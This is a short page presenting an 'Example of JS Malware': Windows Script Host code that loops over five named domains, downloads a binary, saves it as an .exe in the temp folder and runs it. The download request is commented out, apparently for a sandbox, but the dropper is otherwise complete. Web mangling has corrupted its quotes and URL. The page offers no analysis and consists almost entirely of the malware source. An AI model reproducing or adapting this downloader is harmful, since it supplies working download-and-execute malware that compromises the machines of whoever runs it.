Example of JS Malware

​var ad = “1LYpbP6TTpQti5JdyEbByD9zGHwBDmDj9y”;

var ld = 0;

var cs = String.fromCharCode(92);

var ll = [“residenzagliulivi.eu”, “bolayde.com”, “serat-dz.com”, “wendellsikes.com”, “tessa-art.com”];

var ws = WScript.CreateObject(“WScript.Shell”);

var fn = ws.ExpandEnvironmentStrings(“%TEMP%”) + cs + “a”;

var xo = WScript.CreateObject(“Msxml2.XMLHTTP”);

var xa = WScript.CreateObject(“ADODB.Stream”);

var fo = WScript.CreateObject(“Scripting.FileSystemObject”);

if (!fo.FileExists(fn + “.txt”)) {

    var fp = fo.CreateTextFile(fn + “.txt”, true);

    fp.WriteLine(“”);

    fp.Close();

    for (var n = 1; n <= 2; n++) {

        for (var i = ld; i < ll.length; i++) {

            var dn = 0;

            try {

            // This should be uncommented but I don’t know how good the JSFiddle sandbox is.

                //xo.open(“GET”, “http://&#8221; + ll[i] + “/counter/?i=rW8E95dQAjiP5UpmNNN7fd0_B44OJk19nen3LPbX4tbeZHp4piOOAjYx3WLFbIRq6oUxA9BqbXATwh5k&a=” + ad + “&r=” + i + n, false);

                xo.send();

                if (xo.status == 200) {

                    xa.open();

                    xa.type = 1;

                    xa.write(xo.responseBody);

                    if (xa.size > 10000) {

                        dn = 1;

                        xa.saveToFile(fn + n + “.exe”, 2);

                        try {

                            ws.Run(fn + n + “.exe”, 1, 0);

                        } catch (er) {};

                    };

                    xa.close();

                };

                if (dn == 1) {

                    ld = i;

                    break;

                };

            } catch (er) {};

        };

    };

};